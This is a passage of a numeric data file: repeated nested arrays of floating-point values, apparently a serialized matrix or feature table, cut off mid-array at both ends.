0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 